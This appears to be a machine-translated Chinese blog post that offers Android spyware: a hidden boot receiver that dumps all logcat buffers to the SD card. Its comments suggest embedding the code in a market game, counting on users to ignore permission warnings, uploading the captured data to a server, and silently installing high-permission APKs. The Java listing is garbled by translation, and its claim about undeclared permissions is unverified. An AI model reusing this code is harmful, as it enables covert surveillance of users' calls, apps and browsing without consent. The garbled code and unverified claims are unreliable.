Who initiated my privacy (Android user privacy spying)

User privacy is always the first, and user privacy is also the most valuable.

Recently, Major portals have been leaked... Just keep your password safe.

Here I will talk about the method of user privacy under Android, which is also an oversight of Android.

But the most important thing is that the user ignores the permission warning when installing the APK, just as the passwords in all our communities are set to the same.

The culprit is logcat. And a permission detection bug.

 

1. boot

How do I start a program? That is to accept a broadcast about boot. The specific process is as follows: first, declare a permission in the list file.

<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />    

Then, write the worker and set it in the list.

        <receiver android:name ="org.igeek.hack.reciver.HackReceiver">
<intent-filter android:priority ="1000">
<action android:name ="android.intent.action.BOOT_COMPLETED"/>
</intent-filter >
</receiver >

　　

public class HackReceiver extends BroadcastReceiver {

    @Override
public void onReceive(Context context, Intent intent) {
        ................
    }
}

 

In fact, you do not need to declare the permissions.

When the android Package Manager detects that the user wants to install the APK, it only scans the permission declaration in the list and lists the permission warnings to the user. The permission is not declared at all, so it is not listed, but it does not affect usage. This bug has been stuck to 4.0.

 

2. Spying on privacy

We need to record everything about the user, starting from boot!

Some debugging tools of Android are integrated in Rom by default. For example, logcat is not only carried in the SDK, but also available on every Android phone and tablet.

In addition, the android framework writes all logs to the log buffer, including main, events, radio, and system. These log buffers cover almost all aspects of mobile phone operation.

To get started, we will use the process class, that is, the process class. Dalvik will split a process to execute other local programs, just like running commands in shell, shell splits a process to run it. We only need to write the commands in shell as strings and directly throw them to process.

Don't forget to add these two permissions.

    <uses-permission android:name="android.permission.READ_LOGS"/>
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>

 

1 // simple example. The code can be appended to a market application, such as a game.
2 // In fact, some advertisement sdks require a lot of permissions, and many of them need to be started upon startup.
3 // I think it may be to collect user information to analyze users' behaviors and place ads at designated points.
4 public class hackreceiver extends broadcastreceiver {
5
6 @ override
7 public void onreceive (context, intent ){
8
9 // main
10 runnable R1 = new runnable (){
11
12 @ override
13 public void run (){
14 writelog ("org. igeek. Hack. Main. log", "Main ");
15}
16 };
17 // events
18 runnable r2 = new runnable (){
19
20 @ override
21 public void run (){
22 writelog ("org. igeek. Hack. Events. log", "events ");
23}
24 };
25 // radio
26 runnable R3 = new runnable (){
27
28 @ override
29 public void run (){
30 writelog ("org. igeek. Hack. Radio. log", "radio ");
31}
32 };
33 // System
34 runnable r4 = new runnable (){
35
36 @ override
37 public void run (){
38 writelog ("org. igeek. Hack. system. log", "system ");
39}
40 };
41
42 thread T1 = new thread (R1 );
43 thread t2 = new thread (R2 );
44 thread T3 = new thread (r3 );
45 thread t4 = new thread (R4 );
46
47
48
49 t1.start ();
50 t2.start ();
51 t3.start ();
52 t4.start ();
53}
54
55 // you know
56 private void writelog (string file, string content ){
57 try {
58 stringbuilder command = new stringbuilder ("logcat ");
59
60 file devfile = new file (environment. getexternalstoragedirectory (), file );
61 If (devfile. createnewfile ()){
62 command. append ("-B"). append (content );
63
64
65 // Command Format: logcat-B Main
66 // logcat-B radio and so on
67 Process = runtime.getruntime(cmd.exe C (command. tostring ());
68
69
70 // here, convert the standard output of the local program, that is, STD: Out, into the JAVA input stream
71 inputstream input = process. getinputstream ();
72 bufferedreader reader = new bufferedreader (New inputstreamreader (input ));
73
74 // convert the input stream into an output stream. Put it in the directory of the SD card.
75 fileoutputstream output = new fileoutputstream (devfile );
76 bufferedoutputstream bot = new bufferedoutputstream (output );
77
78 log. E ("hack", "log->" + "SD:" + file );
79 string log;
80 while (log = reader. Readline ())! = NULL ){
81
82 // you can extract the desired information according to the Rules after the input stream is obtained.
83 // There is no need to get through
84
85
86 // before shutdown, this cycle is hard to jump out.
87 bot. Write (log. getbytes ());
88
89
90 // here, you can learn to ride 250 and upload the obtained data to the server.
91 /*
92 pseudocode
93
94 add an Internet permission in the list, and I believe that users will not worry too much.
95
96
97 go: connect to the server
98 go: compress and upload data
99
100
101 */
102}
103 bot. Close ();
104 output. Close ();
105 reader. Close ();
106 input. Close ();
107
108 // test it by yourself. You will be surprised to find out who calls you, What programs are you running,
109 // you can record all the webpages you should not read.
110
111
112}
113} catch (ioexception e ){
114 // have a nice day
115 E. printstacktrace ();
116}
117}
118
119}

If you are interested, you can study the installation method of market and market Uri, so that you can silently install the High-Permission APK with zero permissions.

Finally, please pay attention to my series of interesting materials and have more highlights.

Original, reprinted please indicate http://hangxin1940.cnblogs.com

This is only for reference. I have a limited level and may have some omissions or errors. please correct me !!!